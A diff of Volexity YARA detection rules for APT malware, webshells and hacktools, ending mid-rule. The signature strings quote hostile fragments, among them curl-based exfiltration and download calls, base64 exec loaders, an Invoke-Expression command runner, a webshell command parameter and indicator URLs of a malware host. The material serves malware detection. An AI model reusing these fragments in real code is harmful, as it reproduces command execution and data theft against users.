+ version = 4 strings: - $remote = "remote-cert-tls server" ascii - $ip = "Ip: " - $tls = "<tls_auth>" + $s_1 = "def count_md5(src)" + $s_2 = "urllib.request.urlretrieve(image_url,main)" + $s_3 = "m1 != '4c8a326899272d2fe30e818181f6f67f'" + $s_4 = "os.path.split(os.path.realpath(__file__))[0]" + $s_5 = "r_v = os.system('curl '+ini_url+cc)" + $s_6 = "b41ef5f591226a0d5adce99cb2e629d8" + $s_7 = "1df495e7c85e59ad0de1b9e50912f8d0" + $s_8 = "tasklist | findstr mediainfo.exe" + $url_1 = "http://dl1.5kplayer.com/youtube/youtube_dl.png" + $url_2 = "http://dl1.5kplayer.com/youtube/youtube.ini?fire=" + $path_1 = "C:\\\\ProgramData\\\\Digiarty\\\\mediainfo.exe" condition: - all of them + 3 of ($s_*) or any of ($url_*) or $path_1 } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Delivery_Win_Charming_Openvpn_Client : CHARMINGCYPRESS FILE +rule VOLEXITY_Apt_Malware_Win_Pocostick_B : STORMBAMBOO FILE { meta: - description = "Detects a fake OpenVPN client developed by CharmingCypress." + description = "Detects the POCOSTICK family, variant B." author = "threatintel@volexity.com" - id = "b69fdd72-4a55-5e83-b754-401fe9339007" - date = "2023-10-17" - modified = "2023-10-27" - reference = "TIB-20231027" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L287-L310" + id = "2a8a455d-6b5c-53a7-aa5e-91d29efd3aa8" + date = "2020-07-08" + modified = "2024-08-02" + reference = "TIB-20231221" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L281-L312" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "02596a62cb1ba17ecabef0ae93f434e4774b00422a6da2106a2bc4c59d2f8077" + hash = "1e81fb62cb57a3231642f66fee3e10d28a7c81637e4d6a03515f5b95654da585" + logic_hash = "a51e836425ec407706c7b2a4c21cc12398620c7dae6c9504a855f99e4b4d6ab2" score = 75 quality = 80 - tags = "CHARMINGCYPRESS, FILE" - hash1 = "2d99755d5cd25f857d6d3aa15631b69f570d20f95c6743574f3d3e3e8765f33c" + tags = "STORMBAMBOO, FILE" os = "win" os_arch = "all" scan_context = "file" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9768 - version = 2 + rule_id = 1678 + version = 6 strings: - $s1 = "DONE!" - $s2 = "AppCore.dll" - $s3 = "ultralight@@" + $a1 = "AVCAesUtil@@" ascii + $a2 = "AVencrypt_base@@" ascii + $a3 = "AVCCmdTarget@@" ascii + $a4 = "AVCWinThread@@" ascii condition: - all of ($s*) + all of ($a*) or for any resource in pe.resources : (hash.sha256(resource.offset,resource.length)=="b098afd3657b956edbace77499e5e20414ab595a17ffc437b9dadc791eff1cfa" or hash.sha256(resource.offset,resource.length)=="2e53e960d45d657d8ba9929f6c8b34e90b2ae15b879768099474678dd1864f3b") } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Ps1_Powerstar_Generic : CHARMINGCYPRESS FILE MEMORY +rule VOLEXITY_Apt_Malware_Elf_Catchdns_Aug20_Memory : DRIFTINGBAMBOO FILE MEMORY { meta: - description = "Detects POWERSTAR modules based on common HTTP functions used across modules." + description = "Looks for strings from CatchDNS component used to intercept and modify DNS responses, and likely also intercept/monitor http. This rule would only match against memory in the example file analyzed by Volexity." author = "threatintel@volexity.com" - id = "71a3e99d-e1c8-5ac1-abbc-2ba5cba80799" - date = "2023-06-02" - modified = "2023-06-28" + id = "95306735-cdae-5407-ad49-d465d245378d" + date = "2020-08-20" + modified = "2024-08-02" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L311-L335" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "4da02190ffd16304eccbc0d12dfcc5637a6b785af0e3dc3dfcafcfe114597eb2" - score = 75 - quality = 80 - tags = "CHARMINGCYPRESS, FILE, MEMORY" - scan_context = "file,memory" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9356 - version = 2 - - strings: - $http1 = "Send_Upload" ascii wide - $http2 = "Send_Post_Data" ascii wide - $json1 = "{\"OS\":\"" ascii wide - $json2 = "{\"ComputerName\":\"' + $env:COMPUTERNAME + '\"}" ascii wide - $json3 = "{\"Token\"" ascii wide - $json4 = "{\"num\":\"" ascii wide - - condition: - all of ($http*) or all of ($json*) -} -rule VOLEXITY_Apt_Webshell_Pl_Complyshell : UTA0178 FILE MEMORY -{ - meta: - description = "Detection for the COMPLYSHELL webshell." - author = "threatintel@volexity.com" - id = "6b44b5bc-a75f-573c-b9c3-562b7874e408" - date = "2023-12-13" - modified = "2024-01-09" - reference = "TIB-20231215" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L1-L22" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L313-L387" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "ff46691f1add20cff30fe996e2fb199ce42408e86d5642a8a43c430f2245b1f5" + hash = "4f3d35f4f8b810362cbd4c59bfe5a961e559fe5713c9478294ccb3af2d306515" + logic_hash = "a7d677d7eecf388df7e7c2343fd3e46188594473c01075bf8a0b54292a51db94" score = 75 - quality = 80 - tags = "UTA0178, FILE, MEMORY" - hash1 = "8bc8f4da98ee05c9d403d2cb76097818de0b524d90bea8ed846615e42cb031d2" + quality = 55 + tags = "DRIFTINGBAMBOO, FILE, MEMORY" os = "linux" os_arch = "all" + report1 = "MAR-20221222" + report2 = "TIB-20231221" scan_context = "file,memory" + severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9995 - version = 4 + rule_id = 227 + version = 10 strings: - $s = "eval{my $c=Crypt::RC4->new(" + $os1 = "current thread policy=%d" ascii wide + $os2 = "OS_CreatShareMem %s-->%x" ascii wide + $os3 = "sem_open fail" ascii wide + $os4 = "int OS_GetCurRunPath(char*, int)" ascii wide + $os5 = "int OS_GetCurModName(char*, int)" ascii wide + $os6 = "int OS_StrToTime(char*, time_t*)" ascii wide + $os7 = "int OS_TimeToStr(time_t, char*)" ascii wide + $os8 = "int OS_TimeToStrYearMothDay(time_t, char*)" ascii wide + $os9 = "bool OS_Access(const char*)" ascii wide + $os10 = "int OS_Memicmp(const void*, const void*, unsigned int)" ascii wide + $os11 = "int OS_Mkdir(char*)" ascii wide + $os12 = "OS_ConnectSem" ascii wide + $msg1 = "client: last send packet iseq: %x, the ack :%x" ascii wide + $msg2 = "server: last send packet iseq: %x, the iseq :%x" ascii wide + $msg3 = "send packet failed!" ascii wide + $msg4 = "will hijack dns:%s, ip:%s " ascii wide + $msg5 = "dns send ok:%s" ascii wide + $msg6 = "tcp send ok" ascii wide + $msg7 = "FilePath:%s;" ascii wide + $msg8 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide + $msg9 = "Description:%s;" ascii wide + $msg10 = "Line:%d,Fun:%s,ErrorCode:%u;" ascii wide + $msg11 = "get msg from ini is error" ascii wide + $msg12 = "on build eth send_msg or payload is null" ascii wide + $msg13 = "on build udp send_msg or payload is null" ascii wide + $conf1 = "%d.%d.%d.%d" ascii wide + $conf2 = "%s.tty" ascii wide + $conf3 = "dns.ini" ascii wide + $netw1 = "LISTEN_DEV" ascii wide + $netw2 = "SEND_DEV" ascii wide + $netw3 = "SERVER_IP" ascii wide + $netw4 = "DNSDomain" ascii wide + $netw5 = "IpLimit" ascii wide + $netw6 = "HttpConfig" ascii wide + $netw7 = "buildhead" ascii wide + $netw8 = "sendlimit" ascii wide + $netw9 = "content-type" ascii wide + $netw10 = "otherhead_" ascii wide + $netw11 = "configfile" ascii wide + $apache = {48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D 0A 53 65 72 76 65 72 3A 20 41 70 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 25 73 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 25 64 0D 0A} + $cpp1 = "src/os.cpp" + $cpp2 = "src/test_catch_dns.cpp" condition: - $s + 9 of ($os*) or 3 of ($msg*) or all of ($conf*) or all of ($netw*) or $apache or all of ($cpp*) } -rule VOLEXITY_Apt_Webshell_Aspx_Glasstoken : UTA0178 FILE MEMORY +rule VOLEXITY_Apt_Malware_Py_Upstyle : UTA0218 FILE MEMORY { meta: - description = "Detection for a custom webshell seen on external facing server. The webshell contains two functions, the first is to act as a Tunnel, using code borrowed from reGeorg, the second is custom code to execute arbitrary .NET code." + description = "Detect the UPSTYLE webshell." author = "threatintel@volexity.com" - id = "5d96294c-aa61-5752-ab06-d5b27f6ac3a1" - date = "2023-12-12" - modified = "2024-01-09" - reference = "TIB-20231215" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L24-L49" + id = "45726f35-8b3e-5095-b145-9e7f6da6838b" + date = "2024-04-11" + modified = "2024-04-12" + reference = "TIB-20240412" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L1-L33" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "34844dc2ba4b18b25dcb5b14b7b80ec655595c9638600a0f2a6367610c542dd1" + logic_hash = "51923600b23d23f4ce29eac7f5ab9f7e1ddb45bed5f6727ddec4dcb75872e473" score = 75 quality = 80 - tags = "UTA0178, FILE, MEMORY" - hash1 = "26cbb54b1feb75fe008e36285334d747428f80aacdb57badf294e597f3e9430d" - os = "win" + tags = "UTA0218, FILE, MEMORY" + hash1 = "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac" + hash2 = "0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8" + hash3 = "4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f" + os = "linux" os_arch = "all" scan_context = "file,memory" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 9994 - version = 5 + rule_id = 10429 + version = 2 strings: - $s1 = "=Convert.FromBase64String(System.Text.Encoding.Default.GetString(" ascii - $re = /Assembly\.Load\(errors\)\.CreateInstance\("[a-z0-9A-Z]{4,12}"\).GetHashCode\(\);/ + $stage1_str1 = "/opt/pancfg/mgmt/licenses/PA_VM" + $stage1_str2 = "exec(base64." + $stage2_str1 = "signal.signal(signal.SIGTERM,stop)" + $stage2_str2 = "exec(base64." + $stage3_str1 = "write(\"/*\"+output+\"*/\")" + $stage3_str2 = "SHELL_PATTERN" condition: - for any i in (0..#s1) : ($re in (@s1[i]..@s1[i]+512)) + all of ($stage1*) or all of ($stage2*) or all of ($stage3*) } -rule VOLEXITY_Webshell_Aspx_Regeorg : FILE MEMORY +rule VOLEXITY_Susp_Any_Jarischf_User_Path : FILE MEMORY { meta: - description = "Detects the reGeorg webshell based on common strings in the webshell. May also detect other webshells which borrow code from ReGeorg." + description = "Detects paths embedded in samples in released projects written by Ferdinand Jarisch, a pentester in AISEC. These tools are sometimes used by attackers in real world intrusions." author = "threatintel@volexity.com" - id = "02365a30-769e-5c47-8d36-a79608ffd121" - date = "2018-08-29" - modified = "2024-01-09" - reference = "TIB-20231215" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L51-L83" + id = "062a6fdb-c516-5643-9c7c-deff32eeb95e" + date = "2024-04-10" + modified = "2024-04-12" + reference = "TIB-20240412" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L57-L78" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "9d901f1a494ffa98d967ee6ee30a46402c12a807ce425d5f51252eb69941d988" - logic_hash = "4fed023e85a32052917f6db1e2e155c91586538938c03acc59f200a8264888ca" - score = 75 + logic_hash = "574d5b1fadb91c39251600e7d73d4993d4b16565bd1427a0e8d6ed4e7905ab54" + score = 50 quality = 80 tags = "FILE, MEMORY" - os = "win" + hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6" + os = "all" os_arch = "all" scan_context = "file,memory" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 410 - version = 7 + rule_id = 10424 + version = 4 strings: - $a1 = "every office needs a tool like Georg" ascii - $a2 = "cmd = Request.QueryString.Get(\"cmd\")" ascii - $a3 = "exKak.Message" ascii - $proxy1 = "if (rkey != \"Content-Length\" && rkey != \"Transfer-Encoding\")" - $proxy_b1 = "StreamReader repBody = new StreamReader(response.GetResponseStream(), Encoding.GetEncoding(\"UTF-8\"));" ascii - $proxy_b2 = "string rbody = repBody.ReadToEnd();" ascii - $proxy_b3 = "Response.AddHeader(\"Content-Length\", rbody.Length.ToString());" ascii + $proj_1 = "/home/jarischf/" condition: - any of ($a*) or $proxy1 or all of ($proxy_b*) + any of ($proj_*) } -rule VOLEXITY_Hacktool_Py_Pysoxy : FILE MEMORY +rule VOLEXITY_Hacktool_Golang_Reversessh_Fahrj : FILE MEMORY { meta: - description = "SOCKS5 proxy tool used to relay connections." + description = "Detects a reverse SSH utility available on GitHub. Attackers may use this tool or similar tools in post-exploitation activity." author = "threatintel@volexity.com" - id = "88094b55-784d-5245-9c40-b1eebf0e6e72" - date = "2024-01-09" - modified = "2024-01-09" - reference = "TIB-20240109" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-01-10 Ivanti Connect Secure/indicators/yara.yar#L85-L111" + id = "332e323f-cb16-5aa2-8b66-f3d6d50d94f2" + date = "2024-04-10" + modified = "2024-04-12" + reference = "TIB-20240412" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L79-L112" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "f73e9d3c2f64c013218469209f3b69fc868efafc151a7de979dde089bfdb24b2" + logic_hash = "38b40cc7fc1e601da2c7a825f1c2eff209093875a5829ddd2f4c5ad438d660f8" score = 75 quality = 80 tags = "FILE, MEMORY" - hash1 = "e192932d834292478c9b1032543c53edfc2b252fdf7e27e4c438f4b249544eeb" + hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6" os = "all" os_arch = "all" scan_context = "file,memory" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10065 - version = 3 + rule_id = 10423 + version = 5 strings: - $s1 = "proxy_loop" ascii - $s2 = "connect_to_dst" ascii - $s3 = "request_client" ascii - $s4 = "subnegotiation_client" ascii - $s5 = "bind_port" ascii + $fun_1 = "createLocalPortForwardingCallback" + $fun_2 = "createReversePortForwardingCallback" + $fun_3 = "createPasswordHandler" + $fun_4 = "createPublicKeyHandler" + $fun_5 = "createSFTPHandler" + $fun_6 = "dialHomeAndListen" + $fun_7 = "createExtraInfoHandler" + $fun_8 = "createSSHSessionHandler" + $fun_9 = "createReversePortForwardingCallback" + $proj_1 = "github.com/Fahrj/reverse-ssh" condition: - all of them + any of ($proj_*) or 4 of ($fun_*) } rule VOLEXITY_Apt_Malware_Linux_Disgomoji_Modules : UTA0137 FILE MEMORY { @@ -202323,537 +203653,374 @@ rule VOLEXITY_Malware_Golang_Discordc2_Bmdyy : FILE MEMORY condition: $s1 } -rule VOLEXITY_Apt_Malware_Py_Upstyle : UTA0218 FILE MEMORY -{ - meta: - description = "Detect the UPSTYLE webshell." - author = "threatintel@volexity.com" - id = "45726f35-8b3e-5095-b145-9e7f6da6838b" - date = "2024-04-11" - modified = "2024-04-12" - reference = "TIB-20240412" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L1-L33" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "51923600b23d23f4ce29eac7f5ab9f7e1ddb45bed5f6727ddec4dcb75872e473" - score = 75 - quality = 80 - tags = "UTA0218, FILE, MEMORY" - hash1 = "3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac" - hash2 = "0d59d7bddac6c22230187ef6cf7fa22bca93759edc6f9127c41dc28a2cea19d8" - hash3 = "4dd4bd027f060f325bf6a90d01bfcf4e7751a3775ad0246beacc6eb2bad5ec6f" - os = "linux" - os_arch = "all" - scan_context = "file,memory" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10429 - version = 2 - - strings: - $stage1_str1 = "/opt/pancfg/mgmt/licenses/PA_VM" - $stage1_str2 = "exec(base64." - $stage2_str1 = "signal.signal(signal.SIGTERM,stop)" - $stage2_str2 = "exec(base64." - $stage3_str1 = "write(\"/*\"+output+\"*/\")" - $stage3_str2 = "SHELL_PATTERN" - - condition: - all of ($stage1*) or all of ($stage2*) or all of ($stage3*) -} -rule VOLEXITY_Susp_Any_Jarischf_User_Path : FILE MEMORY -{ - meta: - description = "Detects paths embedded in samples in released projects written by Ferdinand Jarisch, a pentester in AISEC. These tools are sometimes used by attackers in real world intrusions." - author = "threatintel@volexity.com" - id = "062a6fdb-c516-5643-9c7c-deff32eeb95e" - date = "2024-04-10" - modified = "2024-04-12" - reference = "TIB-20240412" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L57-L78" - license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "574d5b1fadb91c39251600e7d73d4993d4b16565bd1427a0e8d6ed4e7905ab54" - score = 50 - quality = 80 - tags = "FILE, MEMORY" - hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6" - os = "all" - os_arch = "all" - scan_context = "file,memory" - license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10424 - version = 4 - - strings: - $proj_1 = "/home/jarischf/" +import "pe" +import "hash" - condition: - any of ($proj_*) -} -rule VOLEXITY_Hacktool_Golang_Reversessh_Fahrj : FILE MEMORY +rule VOLEXITY_Apt_Malware_Vbs_Basicstar : CHARMINGCYPRESS FILE MEMORY { meta: - description = "Detects a reverse SSH utility available on GitHub. Attackers may use this tool or similar tools in post-exploitation activity." + description = "VBS backdoor which bares architectural similarity to the POWERSTAR malware family." author = "threatintel@volexity.com" - id = "332e323f-cb16-5aa2-8b66-f3d6d50d94f2" - date = "2024-04-10" - modified = "2024-04-12" - reference = "TIB-20240412" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-04-12 Palo Alto Networks GlobalProtect/indicators/rules.yar#L79-L112" + id = "e790defe-2bd5-5629-8420-ce8091483589" + date = "2024-01-04" + modified = "2024-01-11" + reference = "TIB-20240111" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L64-L92" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "38b40cc7fc1e601da2c7a825f1c2eff209093875a5829ddd2f4c5ad438d660f8" + logic_hash = "977bb42553bb6585c8d0e1e89675644720ca9abf294eccd797e20d4bca516810" score = 75 quality = 80 - tags = "FILE, MEMORY" - hash1 = "161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6" - os = "all" + tags = "CHARMINGCYPRESS, FILE, MEMORY" + hash1 = "c6f91e5585c2cbbb8d06b7f239e30b271f04393df4fb81815f6556fa4c793bb0" + os = "win" os_arch = "all" scan_context = "file,memory" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10423 - version = 5 + rule_id = 10037 + version = 4 strings: - $fun_1 = "createLocalPortForwardingCallback" - $fun_2 = "createReversePortForwardingCallback" - $fun_3 = "createPasswordHandler" - $fun_4 = "createPublicKeyHandler" - $fun_5 = "createSFTPHandler" - $fun_6 = "dialHomeAndListen" - $fun_7 = "createExtraInfoHandler" - $fun_8 = "createSSHSessionHandler" - $fun_9 = "createReversePortForwardingCallback" - $proj_1 = "github.com/Fahrj/reverse-ssh" + $s1 = "Base64Encode(EncSess)" ascii wide + $s2 = "StrReverse(PlainSess)" ascii wide + $s3 = "ComDecode, \"Module\"" ascii wide + $s4 = "ComDecode, \"SetNewConfig\"" ascii wide + $s5 = "ComDecode, \"kill\"" ascii wide + $magic = "cmd /C start /MIN curl --ssl-no-revoke -s -d " ascii wide condition: - any of ($proj_*) or 4 of ($fun_*) + 3 of ($s*) or $magic } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Any_Reloadext_Plugin : STORMBAMBOO FILE MEMORY +rule VOLEXITY_Apt_Malware_Ps1_Powerless_B : CHARMINGCYPRESS FILE MEMORY { meta: - description = "Detection for RELOADEXT, a Google Chrome extension malware." + description = "Detects POWERLESS malware." author = "threatintel@volexity.com" - id = "6c6c8bee-2a13-5645-89ef-779f00264fd9" - date = "2024-02-23" - modified = "2024-08-02" - reference = "TIB-20240227" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L4-L36" + id = "74dd8412-c099-5ecb-af97-c22fede14252" + date = "2023-10-25" + modified = "2023-11-03" + reference = "TIB-20231027" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L93-L150" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "2b11f8fc5b6260ebf00bde83585cd7469709a4979ca579cdf065724bc15052fc" + logic_hash = "a95fe2c8d09d66e07a999eef3a5666cc622bbc063d747626c48b26cfecf35849" score = 75 - quality = 80 - tags = "STORMBAMBOO, FILE, MEMORY" - hash1 = "9d0928b3cc21ee5e1f2868f692421165f46b5014a901636c2a2b32a4c500f761" - os = "all" + quality = 78 + tags = "CHARMINGCYPRESS, FILE, MEMORY" + hash1 = "62de7abb39cf4c47ff120c7d765749696a03f4fa4e3e84c08712bb0484306ae1" + os = "win" os_arch = "all" scan_context = "file,memory" - severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10282 + rule_id = 9794 version = 4 strings: - $man1 = "Reload page with Internet Explorer compatible mode." - $man2 = "\"http://*/*\"" - $code1 = ";chrome[" - $code2 = "XMLHttpRequest(),_" - $code3 = "0x400*0x400" + $fun_1 = "function verifyClickStorke" + $fun_2 = "function ConvertTo-SHA256" + $fun_3 = "function Convert-Tobase" fullword + $fun_4 = "function Convert-Frombase" fullword + $fun_5 = "function Send-Httppacket" + $fun_6 = "function Generat-FetchCommand" + $fun_7 = "function Create-Fetchkey" + $fun_8 = "function Run-Uploader" + $fun_9 = "function Run-Shot" fullword + $fun_10 = "function ShotThis(" + $fun_11 = "function File-Manager" + $fun_12 = "function zip-files" + $fun_13 = "function Run-Stealer" + $fun_14 = "function Run-Downloader" + $fun_15 = "function Run-Stro" fullword + $fun_16 = "function Run-Tele" fullword + $fun_17 = "function Run-Voice" + $s_1 = "if($commandtype -eq \"klg\")" + $s_2 = "$desrilizedrecievedcommand" + $s_3 = "$getAsyncKeyProto = @" + $s_4 = "$Global:BotId =" + $s_5 = "$targetCLSID = (Get-ScheduledTask | Where-Object TaskName -eq" + $s_6 = "$burl = \"$Global:HostAddress/" + $s_7 = "$hashString = [System.BitConverter]::ToString($hash).Replace('-','').ToLower()" + $s_8 = "$Global:UID = ((gwmi win32_computersystemproduct).uuid -replace '[^0-9a-z]').substring(" + $s_9 = "$rawpacket = \"{`\"MId`\":`\"$Global:MachineID`\",`\"BotId`\":`\"$basebotid`\"}\"" + $s_10 = "$bitmap = New-Object System.Drawing.Bitmap $bounds.Width, $bounds.Height" + $s_12 = "Runned Without any Error" + $s_13 = "$commandresponse = (Invoke-Expression $instruction -ErrorAction Stop) | Out-String" + $s_14 = "Operation started successfuly" + $s_15 = "$t_path = (Get-WmiObject Win32_Process -Filter \"name = '$process'\" | Select-Object CommandLine).CommandLine" + $s_16 = "?{ $_.DisplayName -match \"Telegram Desktop\" } | %{$app_path += $_.InstallLocation }" + $s_17 = "$chlids = get-ChildItem $t -Recurse -Exclude \"$t\\tdata\\user_data\"" + $s_18 = "if($FirsttimeFlag -eq $True)" + $s_19 = "Update-Conf -interval $inter -url $url -next_url $next -conf_path $conf_path -key $config_key" condition: - all of ($man*) or (#code1>8 and #code2>=2 and #code3>=2) + 3 of ($fun_*) or any of ($s_*) } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Macos_Reloadext_Installer : STORMBAMBOO FILE MEMORY +rule VOLEXITY_Apt_Malware_Macos_Vpnclient_Cc_Oct23 : CHARMINGCYPRESS FILE MEMORY { meta: - description = "Detect the RELOADEXT installer." + description = "Detection for fake macOS VPN client used by CharmingCypress." author = "threatintel@volexity.com" - id = "c65ea2b5-ab98-5693-92ea-05c0f1ea1e5b" - date = "2024-02-23" - modified = "2024-08-02" - reference = "TIB-20240227" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L37-L62" + id = "e0957936-dc6e-5de6-bb23-d0ef61655029" + date = "2023-10-17" + modified = "2023-10-27" + reference = "TIB-20231027" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-02-13 CharmingCypress/rules.yar#L236-L261" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "8688796839202d95ded15e10262a7a7c7cbbae4a332b60305402e5984005d452" + logic_hash = "da5e9be752648b072a9aaeed884b8e1729a14841e33ed6633a0aaae1f11bd139" score = 75 quality = 80 - tags = "STORMBAMBOO, FILE, MEMORY" - hash1 = "07e3b067dc5e5de377ce4a5eff3ccd4e6a2f1d7a47c23fe06b1ededa7aed1ab3" - os = "darwin" + tags = "CHARMINGCYPRESS, FILE, MEMORY" + hash1 = "11f0e38d9cf6e78f32fb2d3376badd47189b5c4456937cf382b8a574dc0d262d" + os = "darwin,linux" os_arch = "all" + parent_hash = "31ca565dcbf77fec474b6dea07101f4dd6e70c1f58398eff65e2decab53a6f33" scan_context = "file,memory" - severity = "critical" license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" - rule_id = 10281 - version = 2 + rule_id = 9770 + version = 3 strings: - $str1 = "/CustomPlug1n/" - $str2 = "Chrome NOT installed." - $str3 = "-f force kill Chrome" - $str4 = "/*} &&cp -rf ${" + $s1 = "networksetup -setsocksfirewallproxystate wi-fi off" ascii + $s2 = "networksetup -setsocksfirewallproxy wi-fi ___serverAdd___ ___portNum___; networksetup -setsocksfirewallproxystate wi-fi on" ascii + $s3 = "New file imported successfully." ascii + $s4 = "Error in importing the File." ascii condition: - 3 of them + 2 of ($s*) } -import "hash" import "pe" +import "hash" -rule VOLEXITY_Apt_Malware_Any_Macma_A : STORMBAMBOO FILE MEMORY +rule VOLEXITY_Apt_Malware_Charmingcypress_Openvpn_Configuration : CHARMINGCYPRESS FILE { meta: - description = "Detects variants of the MACMA backdoor, variants of MACMA have been discovered for Windows, macOS and android." + description = "Detection for a .ovpn file used in a malicious VPN client on victim machines by CharmingCypress." author = "threatintel@volexity.com" - id = "6ab45af1-41e5-53fc-9297-e2bc07ebf797" - date = "2021-11-12" - modified = "2024-08-02" - reference = "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2024/2024-08-02 StormBamboo/rules.yar#L64-L112" + id = "f39b2d7c-f0c5-5623-a114-02ba32469e59" + date = "2023-10-17" + modified = "2023-10-27" + reference = "TIB-20231027" + source_url = 